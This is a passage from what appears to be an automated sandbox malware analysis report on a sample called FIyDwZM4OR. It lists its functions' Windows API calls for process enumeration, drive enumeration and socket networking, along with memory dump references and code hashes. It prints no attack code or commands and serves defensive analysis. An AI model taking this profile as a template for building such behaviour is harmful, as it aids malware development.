                                                              • Opcode Fuzzy Hash: 40ea675f4b61bb987d361be100f085bd2ec8f5d86b9a00a34460bf7dd23dbd36
                                                              • Instruction Fuzzy Hash: 8311F0FA19E114BEA24792415F109F67B2DE7CB630B398466F842E75C3E3C40A4E5572
                                                              Function 07180373 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 762150938e2717a9b38fd7591dabc5dee31bcd24988c54962cf4c6f06a87e5a5
                                                              • Instruction ID: 15857b0f42ebfab46de94001cf081f2bbb5c106c54612af25e05e0f943cf6efa
                                                              • Opcode Fuzzy Hash: 762150938e2717a9b38fd7591dabc5dee31bcd24988c54962cf4c6f06a87e5a5
                                                              • Instruction Fuzzy Hash: 8511C6FB2AD029BD719AA1415F50AFA662DD3CF730B358426F843D66C2E3C40E4E1971
                                                              Function 07180427 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 31b9a9254b98895710fffbdb8da465f7a6ee40b8f06cee5c6110b7686408e929
                                                              • Instruction ID: f505d824d8576cea476ffa2a930c14523525ae18b30c2ffcd9d60cca33cdd869
                                                              • Opcode Fuzzy Hash: 31b9a9254b98895710fffbdb8da465f7a6ee40b8f06cee5c6110b7686408e929
                                                              • Instruction Fuzzy Hash: D11161FB29D025BD7186A181AF14AFA662DE3CB630735C426F843D6892E3C44E4E1871
                                                              Function 07130317 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: dbde8efbf7e88b3e1f7144f9be457a1f271b5eefc0702159b13e3a855c3da50b
                                                              • Instruction ID: 79ce2457ea3f9c77558261c697ff1efe041f2891db8dfb7f9005e67b8ca07240
                                                              • Opcode Fuzzy Hash: dbde8efbf7e88b3e1f7144f9be457a1f271b5eefc0702159b13e3a855c3da50b
                                                              • Instruction Fuzzy Hash: 6D11E3EA11D250AFF20682916F14BFBABAED6CB730B35843BB447D2186D3980E495131
                                                              Function 071803ED Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: f6f63df57e493ab2fe5cbf2ea701e3ca73570da868f05378799c4f2e0d829eb7
                                                              • Instruction ID: 11405573da6b605a5791c1fbba1a6a5e6ecdd79b97758cdd1808e4a847e55a4f
                                                              • Opcode Fuzzy Hash: f6f63df57e493ab2fe5cbf2ea701e3ca73570da868f05378799c4f2e0d829eb7
                                                              • Instruction Fuzzy Hash: BA0152FB29D0157C7186A1815F18EFA662DD6CB630B36C426F843D6892E3C44E4E1471
                                                              Function 071303BD Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 1d94275d6c0c0f41aa3510c22c0cbae87b5e8056fe7cbb95edc4a9abdce0b850
                                                              • Instruction ID: 31bc04cdc3e0eb0602aa9296b2ec789f6e72e273d974a021531045fce1d32a9f
                                                              • Opcode Fuzzy Hash: 1d94275d6c0c0f41aa3510c22c0cbae87b5e8056fe7cbb95edc4a9abdce0b850
                                                              • Instruction Fuzzy Hash: 8E1199FB6092506EF706816066856FA7BAEF7CB330B31887AE441C6842E3484E0B4272
                                                              Function 071803DE Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: ae3985e174cf0a902a6d9fe3ad41115b4adbe793c6649b6eecfc3c375748983d
                                                              • Instruction ID: 1365478bf2102d14b4dbc5cf4217443f972c289fbdb4441fd9989f973a6278ec
                                                              • Opcode Fuzzy Hash: ae3985e174cf0a902a6d9fe3ad41115b4adbe793c6649b6eecfc3c375748983d
                                                              • Instruction Fuzzy Hash: 3D014CFB2DD025BC718AA1816F14ABA662DD3CB730B358426F843D6982E3C40E4E1472
                                                              Function 07130352 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 78863f4bae2db4f6d2e122ee59dbffe845fa0a0edf985d89b1539960af41b70e
                                                              • Instruction ID: e1df8a0a0d3b854afd6e392640b2730fb1aea5823a7a1cbbdcbdb1133bdf245c
                                                              • Opcode Fuzzy Hash: 78863f4bae2db4f6d2e122ee59dbffe845fa0a0edf985d89b1539960af41b70e
                                                              • Instruction Fuzzy Hash: 2701F7FB21C210AFF20685516B106FA6BEFE7CF730B314436B046D2582D7A84A0A0135
                                                              Function 0713037E Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 84bd76b2b52c58d1980d2e826377f9b1e8b63025b31b0020e57d6b14d53e683f
                                                              • Instruction ID: 8778c4be8833ad97c1f0ada6b717e662376798d74c8c01dfaa38654b9aafec87
                                                              • Opcode Fuzzy Hash: 84bd76b2b52c58d1980d2e826377f9b1e8b63025b31b0020e57d6b14d53e683f
                                                              • Instruction Fuzzy Hash: DCF024FB2582107EF206C5516B14BFA6BAFE7CB730B31843AF507D1581E7984E4A0131
                                                              Function 07130368 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 98d070307b53b69a5a6d493d42fa9f31e313557b1e1d8091a0b0e63f761c3932
                                                              • Instruction ID: dcf8effdd6e0a8d208e568c4e0dee107083909daadcd855eec4e639491c1af65
                                                              • Opcode Fuzzy Hash: 98d070307b53b69a5a6d493d42fa9f31e313557b1e1d8091a0b0e63f761c3932
                                                              • Instruction Fuzzy Hash: 22F096EB258210AEB10585416B447FA56AFE6CF730B318436B507D1582D7984E091135
                                                              Function 07130372 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 45edf5fa0e54581e5ede4e24b99ba1722abd86e0995b910b1afffb464df1abfb
                                                              • Instruction ID: 0a7d70ff6371be7f0a8ac0a9201ed6e5e03ab48a0096260d78f2a9d1869b40d6
                                                              • Opcode Fuzzy Hash: 45edf5fa0e54581e5ede4e24b99ba1722abd86e0995b910b1afffb464df1abfb
                                                              • Instruction Fuzzy Hash: 50F0B4EB25C2106EF20985812B14BFAAAAFE7CF330B31843AB507D1586D7984F091135
                                                              Function 00F5AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00F5AFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 73f42b3fb9e5eabb0689a19dbafb1f35fa9da4b9ada6e084597928aa80626dab
                                                              • Instruction ID: aee956c41de0d89dcb482b155e31bec66398bd0460c452fee7be5ace4d972656
                                                              • Opcode Fuzzy Hash: 73f42b3fb9e5eabb0689a19dbafb1f35fa9da4b9ada6e084597928aa80626dab
                                                              • Instruction Fuzzy Hash: D811967080878595EB268F18D8027E6B3F4EFD0329F109618EAD942150F7329ACA9BD2
                                                              Function 0713039C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 3a69cc483f498e85c5481f4fee25263a58d45e87b61814eeff1832ff7d0f893a
                                                              • Instruction ID: d5da7c7a6ea4833d0cf3d727f870dd58b71e9d5c0c4688b55f775533bd9456e1
                                                              • Opcode Fuzzy Hash: 3a69cc483f498e85c5481f4fee25263a58d45e87b61814eeff1832ff7d0f893a
                                                              • Instruction Fuzzy Hash: D0F059FA2583106EE20685106B507F66BEFE7CB330F30443AF046E2581D7E84A0A0134
                                                              Function 00F5A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00F5A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 6ca636461655859167458b6fe65ebaeb43227b85bc701155f777a78322d21edc
                                                              • Instruction ID: af37b8f00864f542b02069895c7274ab4f994ffcdfc79022006a67fe5180770b
                                                              • Opcode Fuzzy Hash: 6ca636461655859167458b6fe65ebaeb43227b85bc701155f777a78322d21edc
                                                              • Instruction Fuzzy Hash: AF01A272B01710AFC6148F24DC45B5AB7A5EF84721F068659EA982B361C331AC149BE2
                                                              Function 00F5A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00F4712E,?,?,?,00001001,00000000), ref: 00F5A90C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: e91b0b94a7d3001797bc5aaf6e32edd70a01b0ec39b74327df967a5e9b459bd7
                                                              • Instruction ID: ffaa54cc73857cd977b2af66ffce06c12a0f729d9f925bb1ee6131861065aa99
                                                              • Opcode Fuzzy Hash: e91b0b94a7d3001797bc5aaf6e32edd70a01b0ec39b74327df967a5e9b459bd7
                                                              • Instruction Fuzzy Hash: 64F06D75109318AFD2209E01DC44D6BBBEDFFC9764F05466DFD48232118270AE24DAB2
                                                              Function 00F5AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,00F5B280,00000000,-00000001,00000000,00F5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00F5AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 2003cfcf0e13aa9e81f06402403658ba86ca21df21458379ac016159f4c5cdfc
                                                              • Instruction ID: b225f9b34f63adbc59ba0a63addfedba65a003727f383676dd65aff3f8a897b8
                                                              • Opcode Fuzzy Hash: 2003cfcf0e13aa9e81f06402403658ba86ca21df21458379ac016159f4c5cdfc
                                                              • Instruction Fuzzy Hash: 66E0EDB6A092216BD654DE18E8449ABF3ADEFC4B21F055A49BD5467204C330AC5487E2
                                                              Function 00F5B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • closesocket.WS2_32(?,00F59422,?,?,?,?,?,?,?,?,?,?,?,00F43377,01324C60,00000000), ref: 00F5B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: d935019488c59b00ed1ef855b6f8c3b8e3d26d9854d4645e0c7d9e9b8776011e
                                                              • Instruction ID: 58395796375bff63f4df19a80992cfe962ef08b03c10f37b289aec97e08890c7
                                                              • Opcode Fuzzy Hash: d935019488c59b00ed1ef855b6f8c3b8e3d26d9854d4645e0c7d9e9b8776011e
                                                              • Instruction Fuzzy Hash: 92D0C234B0020157CA209B14C884A57732B7FC0321FA8CB68E92C4A1D0D73BCC4B9601
                                                              Function 00EF67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,00ECAF56,?,00000001), ref: 00EF67FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: deaf4c5b4468baab1596e476b21a2a62d3243122072c2ec1b441c7f043b79e35
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: deaf4c5b4468baab1596e476b21a2a62d3243122072c2ec1b441c7f043b79e35
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              Function 0121B180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
